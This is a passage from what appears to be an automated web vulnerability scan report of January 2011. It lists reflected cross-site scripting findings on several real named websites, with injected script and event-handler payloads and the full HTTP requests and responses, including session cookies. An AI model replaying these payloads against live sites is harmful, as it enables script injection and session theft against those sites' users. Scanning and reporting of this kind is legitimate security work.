The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50551'><script>alert(1)</script>bfed0d29885 was submitted in the REST URL parameter 1. This input was echoed as 50551\'><script>alert(1)</script>bfed0d29885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content50551'><script>alert(1)</script>bfed0d29885/themes/fusion/style.css HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:35:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:35:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content50551\'><script>alert(1)</script>bfed0d29885/themes/fusion/style.css' hreflang='en' >
...[SNIP]...

5.319. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16b66'><script>alert(1)</script>deb5d103fe9 was submitted in the REST URL parameter 2. This input was echoed as 16b66\'><script>alert(1)</script>deb5d103fe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes16b66'><script>alert(1)</script>deb5d103fe9/fusion/style.css HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:36:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:36:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes16b66\'><script>alert(1)</script>deb5d103fe9/fusion/style.css' hreflang='en' >
...[SNIP]...

5.320. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e53ad'><script>alert(1)</script>b5fc692f83c was submitted in the REST URL parameter 3. This input was echoed as e53ad\'><script>alert(1)</script>b5fc692f83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusione53ad'><script>alert(1)</script>b5fc692f83c/style.css HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:36:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusione53ad\'><script>alert(1)</script>b5fc692f83c/style.css' hreflang='en' >
...[SNIP]...

5.321. http://www.davidpoll.com/wp-content/themes/fusion/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf215'><script>alert(1)</script>7a65bd68b30 was submitted in the REST URL parameter 4. This input was echoed as bf215\'><script>alert(1)</script>7a65bd68b30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/fusion/style.cssbf215'><script>alert(1)</script>7a65bd68b30 HTTP/1.1
Host: www.davidpoll.com
Proxy-Connection: keep-alive
Referer: http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6033be6539a/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0327f22e76c677f66a17b5702dd9d632

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:36:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:36:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content/themes/fusion/style.cssbf215\'><script>alert(1)</script>7a65bd68b30' hreflang='en' >
...[SNIP]...

5.322. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8460a'><script>alert(1)</script>d095b2bd0ba was submitted in the REST URL parameter 1. This input was echoed as 8460a\'><script>alert(1)</script>d095b2bd0ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes8460a'><script>alert(1)</script>d095b2bd0ba/js/jquery/jquery.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes8460a\'><script>alert(1)</script>d095b2bd0ba/js/jquery/jquery.js' hreflang='en' >
...[SNIP]...

5.323. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5197'><script>alert(1)</script>536fa7560e0 was submitted in the REST URL parameter 2. This input was echoed as b5197\'><script>alert(1)</script>536fa7560e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsb5197'><script>alert(1)</script>536fa7560e0/jquery/jquery.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:23:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes/jsb5197\'><script>alert(1)</script>536fa7560e0/jquery/jquery.js' hreflang='en' >
...[SNIP]...

5.324. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a3f9'><script>alert(1)</script>d614a331f52 was submitted in the REST URL parameter 3. This input was echoed as 8a3f9\'><script>alert(1)</script>d614a331f52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery8a3f9'><script>alert(1)</script>d614a331f52/jquery.js HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:24:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:24:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes/js/jquery8a3f9\'><script>alert(1)</script>d614a331f52/jquery.js' hreflang='en' >
...[SNIP]...

5.325. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidpoll.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50915'><script>alert(1)</script>7ada97d6528 was submitted in the REST URL parameter 4. This input was echoed as 50915\'><script>alert(1)</script>7ada97d6528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.js50915'><script>alert(1)</script>7ada97d6528 HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:24:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:24:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes/js/jquery/jquery.js50915\'><script>alert(1)</script>7ada97d6528' hreflang='en' >
...[SNIP]...

5.326. http://www.foxsportsarizona.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ef4<script>alert(1)</script>3e333fdba2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /27ef4<script>alert(1)</script>3e333fdba2b HTTP/1.1
Host: www.foxsportsarizona.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:24:13 GMT
Connection: close
Content-Length: 766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/27ef4<script>alert(1)</script>3e333fdba2b"</strong>
...[SNIP]...

5.327. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7b076<script>alert(1)</script>2733af53564 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html7b076<script>alert(1)</script>2733af53564 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:54:06 GMT
Content-Length: 832
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html7b076<script>alert(1)</script>2733af53564"</strong>
...[SNIP]...

5.328. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [blockID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae80"><script>alert(1)</script>321dc9a6397 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825fae80"><script>alert(1)</script>321dc9a6397&feedID=3698&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:48 GMT
Date: Sat, 29 Jan 2011 23:53:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<input type=hidden name="blockID" id = "blockID" value="399825fae80"><script>alert(1)</script>321dc9a6397">
...[SNIP]...

5.329. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [feedID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e7b6"><script>alert(1)</script>5adddc3a2b0 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=36989e7b6"><script>alert(1)</script>5adddc3a2b0&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:54:06 GMT
Date: Sat, 29 Jan 2011 23:54:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825^feedID=36989e7b6"><script>alert(1)</script>5adddc3a2b0^gt1=39002^',300,500);" rel="nofollow">
...[SNIP]...

5.330. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffa5"%3balert(1)//4d5eca5bcd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7ffa5";alert(1)//4d5eca5bcd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5"%3balert(1)//4d5eca5bcd1=1 HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 30 Jan 2011 01:53:42 GMT
Server: Apache
Cache-Control: no-store, nocache, must-revalidate, private, post-check=0, pre-check=0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
X-Powered-By: PHP/5.2.8
Last-Modified: Sun, 30 Jan 2011 01:53:42 GMT
Pragma: no-cache
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352422574219; path=/; expires=Fri, 29-Jan-16 01:53:42 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.151141296352422579; path=/; expires=Fri, 29-Jan-16 01:53:42 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1342243082.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 4106

<!doctype html public "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>We're Sorry</title>
<meta http-equiv="Expires" content="0" />
<meta h
...[SNIP]...
s.prop3=s.getTimeParting('w','-6',2011);
s.channel = "hoovers";
s.server = "hoovers.com";
s.prop4 = "paid";
s.prop8 = "500";
s.prop15 = "/global/mktg/index.xhtml?pageid=13823&7ffa5";alert(1)//4d5eca5bcd1=1";
s.prop49 = "";
s.prop44 = "Registered:Logged In";


buildOmnitureGeneric();
signifyError("500");
</script>
...[SNIP]...

5.331. http://www.linkedin.com/cws/share-count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /cws/share-count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 98145<img%20src%3da%20onerror%3dalert(1)>ab8a6f417f4 was submitted in the url parameter. This input was echoed as 98145<img src=a onerror=alert(1)>ab8a6f417f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cws/share-count?url=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual98145<img%20src%3da%20onerror%3dalert(1)>ab8a6f417f4 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:4385026427982852534"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8HtrtVFOqFud1hjpwjpyWjXuFMG2upcnrpWYWInthCyIutxFj3dqg5:1296399980:702de7d65e108e60e7604601831862f69f5f2f9e"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:36:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 30 Jan 2011 15:06:20 GMT
Content-Length: 180

IN.Tags.Share.handleCount({"count":0,"url":"http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual98145<img src=a onerror=alert(1)>ab8a6f417f4"});

5.332. http://www.neudesicmediagroup.com/Advertising.aspx [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.neudesicmediagroup.com
Path:   /Advertising.aspx

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d710"%3balert(1)//68483822cd8 was submitted in the site parameter. This input was echoed as 2d710";alert(1)//68483822cd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Advertising.aspx?site=Silverlight2d710"%3balert(1)//68483822cd8 HTTP/1.1
Host: www.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:23:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=m34i4mxcb24co3masqbyxaxg; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 11128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
industries = [];
                   $('.industry:checked').each(function () {
                       industries.push($(this).val());
                   });

                   $.post("resources/handlers/contact.ashx",
                   {
                       referrer: "Silverlight2d710";alert(1)//68483822cd8",
                       name: $('#name').val(),
                       company: $('#company').val(),
                       email: $('#email').val(),
                       phone: $('#phone').val(),
                       budget: $('#budget').val(),
                       industry: industries.j
